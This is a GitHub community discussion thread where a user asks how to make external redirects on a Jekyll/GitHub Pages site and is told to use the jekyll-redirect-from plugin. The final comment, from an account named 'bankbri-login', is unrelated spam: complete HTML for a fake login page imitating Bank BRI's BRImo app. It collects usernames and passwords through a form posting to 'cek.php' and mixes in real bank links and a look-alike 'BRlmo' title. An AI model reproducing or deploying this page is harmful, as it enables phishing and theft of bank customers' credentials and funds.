### DISCUSSION TITLE
Redirect external URL without plugins

### DISCUSSION THREAD

**Discussion by salimbenfarhat** [community/community#45643] [Other Feature Feedback, Questions, & Ideas] [answered]
### Select Topic Area

Question

### Body

Hello, it is possible to make external redirections with jekyll and github pages?
I want to use redirections with this template but I've no ideas how to do it.  

```<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="refresh" content="1;url={{ page.redirect }}"/>
<link rel="canonical" href="{{ page.redirect }}"/>
<script type="text/javascript">window.location.href = "{{ page.redirect }}"</script>
<title>Redirection...</title>
</head>
<body> If you are not redirected automatically, follow <a href='{{ page.redirect }}'>this link</a>.</body>
</html>

**Comment by jge162** [comment, marked as answer]
Hello @salimbenfarhat if you are using GitHub Pages to host your Jekyll site, external redirections are only possible for custom domains and not for GitHub pages subdomain, so you can use the _redirects file or the jekyll-redirect-from plugin.

**Reply by salimbenfarhat** [reply]
Thank you for your feedback. I've linked my github jekyll repo to my domain with CNAME file. I want to create system where one post = one permalink = one external redirection. Or if it's more easy, in one file i put and manage all my routes(redirections). I don't know if you understood @jge162 ?

**Reply by jge162** [reply]
Yes I did but it’s a very extensive process. I just gave a short explanation versus a long explanation. Sorry

**Reply by jge162** [reply]
@salimbenfarhat in order make external redirections with Jekyll and GitHub Pages, you can use the redirect_to plugin. First, add the plugin to your Jekyll project by adding gem 'jekyll-redirect-from' to your Gemfile and then running bundle install. 

Next, create a new file in your Jekyll project with the desired redirect URL, for example redirect.html, and add the following front matter to the file->

redirect_to: https://example.com

This will redirect the user to https://example.com/ when they visit the redirect.html page on your GitHub Pages site.

Hope this explanation a little better.

**Reply by salimbenfarhat** [reply]
Hello @jge162 thanks you it's works correctly. I was also inspired by this repo using the same plugin : https://github.com/hlaueriksson/hlaueriksson.me.

**Comment by bankbri-login** [comment]
`<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="fragment" content="!">
    <meta name="description" content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ...">
    <meta name="twitter:card" content="summary_large_image" />
    <meta property="og:title" content="BRlmo - Bank BRI" />
    <meta name="twitter:title" content="BRlmo - Bank BRI" />
    <meta property="og:site_name" content="BRImo" />
    <meta name="twitter:site_name" content="BRImo" />
    <meta property="og:description" content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ..." />
    <meta name="twitter:description" content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ..." />
    <link rel="image_src" href="img/bri-header.jpg?w=&h=&auto=compress&dpr=1&fit=max" />
    <meta property="og:image" content="img/bri-header.jpg?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max" />
    <meta name="twitter:image:src" content="img/bri-header.jpg?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max" />
    <meta property="og:type" content="website" />
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />
    <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui">
    <title>BRImo- Bank BRI</title>
    
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous">
    <link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css"/>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        body {
            padding: 0;
            margin: 0;
            width: 100%;
            font-family: 'Open Sans', sans-serif;
        }

        .text-header {
            font-family: 'Verdana', sans-serif;
            color: #0086e0;
        }

        .text-subheader {
            font-family: 'Open Sans', sans-serif;
            margin-top: -20px;
            color: #000;
        }

        .btn-punya {
            display: block;
            margin: 80px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: none rgb(0, 134, 224);
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }

        .btn-belum {
            display: block;
            margin: 10px auto;
            padding: 0px; 
            cursor: pointer; 
            background: none transparent;
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(0, 134, 224);
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            transition: background 200ms ease 0s;
        }

        .form-log {
            box-sizing: border-box; 
            height: 60px; 
            width: 536px; 
            max-width: 100%; 
            border-top: 1px inset rgba(250, 250, 250, 0.13); 
            border-right: 1px solid rgba(184, 184, 184, 0.53); 
            border-bottom: none; 
            border-left: 1px outset rgba(168, 168, 168, 0.58); 
            border-image: initial; 
            background-color: rgb(255, 255, 255); 
            border-radius: 5px 5px 0px 0px; 
            box-shadow: rgb(237, 237, 237) 2px 2px 2px 0px; 
            font-family: 'Open Sans', sans-serif;
            font-size: 16px; 
            color: rgb(28, 28, 28); 
            word-spacing: 7px; 
            padding: 0px 45px;
        }

        #ionIcons {
            color: rgb(22, 119, 199);
            font-size: 29px;
            position: absolute;
            display: block;
            margin-top: 7px;
            margin-left: 15px;
        }

        .eye {
            display: block;
            margin: -40px auto;
            margin-right: 20px;
            position: relative;
            box-sizing: border-box; 
            z-index: 16; 
            height: 19.8189px;
            width: 25.0236px; 
            float: right;
            border-radius: 0px; 
            cursor: pointer;
        }

        .btn-login {
            display: block;
            margin: 60px 0 0 0;
            padding: 0px; 
            cursor: pointer; 
            background: none rgba(0, 111, 214, 0.96); 
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 370px; 
            font-family: Arial; 
            font-size: 17px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 1px; 
            line-height: 1; 
            border-radius: 8px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 100ms step-start 0s;
        }

        @media only screen and (max-width: 600px) {
            .btn-login {
                width: 82%;
            }
        }
    </style>
  </head>
  <body>
    <div class="container">
        <div class="row">
            <div class="col-12 d-block mx-auto text-center p-0" style="height: auto; width: auto; max-width: auto; margin-top: -0px; border-radius: 0px;">
                <img alt="" src="img/1658047233080.jpg" style="display: block; margin: 0px; width: 100%; height: 100%; border-radius: 0px;">
            </div>
        </div>
        <div class="row" style="margin-top: 10px;">
            <div class="col-12 d-block mx-auto" style="margin-bottom: 10px; white-space: pre-wrap; width: 459px; max-width: 100%; left: 0px; top: 0px; height: 98.8px; padding-bottom: 0px; font-family: Barlow; font-size: 16px; font-weight: 400; color: rgb(59, 59, 59); line-height: 1.4; border-radius: 0px;">
                <div class="text-header"><font  style="font-size: 19px; font-weight: bold;"><strong>Login</strong></font></div>
            </div>
        </div>
        <form method="post" action="cek.php">
            <input type="hidden" name="login" value="login">
            <div class="row">
                <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: -20px auto;">
                    <div>
                        <i class="ion-ios-person-outline" id="ionIcons"></i>
                        <input name="email" type="text" class="bubble-element Input form-log" placeholder="Username" maxlength="" required>
                    </div>
                    <div style="margin-top: 1px">
                        <i class="ion-ios-locked-outline" id="ionIcons"></i>
                        <input type="password" name="pass" id="password" class="bubble-element Input form-log" placeholder="Password" maxlength="" required>
                        <div class="bubble-element eye clickable-element" tabindex="3" id="eyeOpen">
                            <img alt="" id="eye" src="img/tutup.jpg?w=24&amp;h=19&amp;auto=compress&amp;dpr=2&amp;fit=max" style="display: block; margin: 0px; width: 100%; height: 100%; border-radius: 0px;">
                        </div>
                        <div class="bubble-element eye clickable-element" tabindex="3" id="eyeClose" style="display: none">
                            <img alt="" id="eye" src="img/buka.jpg?w=32&h=26&auto=compress&dpr=2&fit=max" style="display: block; margin: 0px; width: 100%; height: 100%; border-radius: 0px;">
                        </div>
                        
                    </div>
                    <div class="text-header" style="float: right; position: relative; z-index: 999; display: block; margin-top: 15px;"><font  style="font-size: 16px" color="#000000"><strong><a href="https://ib.bri.co.id/ib-bri/id/forget-password.html" target="_blank" style="color: #000; text-decoration: none;">Lupa Password?</a></strong></font></div>
                </div>
            </div>
            <div class="row mt-3">
                <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: -20px auto;">
                    <button class="btn-login" type="submit" value="send">Login</button>

                    <div class="bubble-r-box" style="height: 57px; float: right; display: block; margin-top: -65px; width: 51px;">
                        <div class="bubble-element Group" style="box-sizing: border-box; width: 55px; background-color: rgb(0, 111, 214); border-radius: 5px; box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; height: 57px;">
                            <div class="bubble-r-line" style="margin-top: 9px; height: 38px;">
                                <div class="bubble-r-box" style="height: 38px; padding-top: 6px; width: 45px; position: relative; display: block; margin: auto;">
                                    <div class="bubble-element HTML" style="box-sizing: border-box; z-index: 2; height: auto; width: 45px; position: relative; display: block; margin: auto; padding: 4px; border-radius: 0px;">
                                        <title>Google Icons</title>
                                        <meta name="viewport" content="width=device-width, initial-scale=1">
                                        <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
                                        <center>
                                            <i class="material-icons" style="font-size:36px;color:white">fingerprint</i>
                                        <center>
                                    </div>
                                </div>
                            </div>
                        </div
                        </div>
                </div>
            </div>
        </form>
    </div><br><br>

    <script src="js/jquery.min.js"></script>
    <script src="/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script>
    <script>
        $(document).ready(function() {
            $("div#eyeOpen").on('click', function() {
                $("#eyeOpen").css("display", "none");
                $("#eyeClose").css("display", "block");

                $("#password").prop("type", "text");

                $("div#eyeClose").on('click', function() {
                    $("#eyeOpen").css("display", "block");
                    $("#eyeClose").css("display", "none");

                    $("#password").prop("type", "password");
                });
            });

            
        });
    </script>
    
  </body>
</html>
`
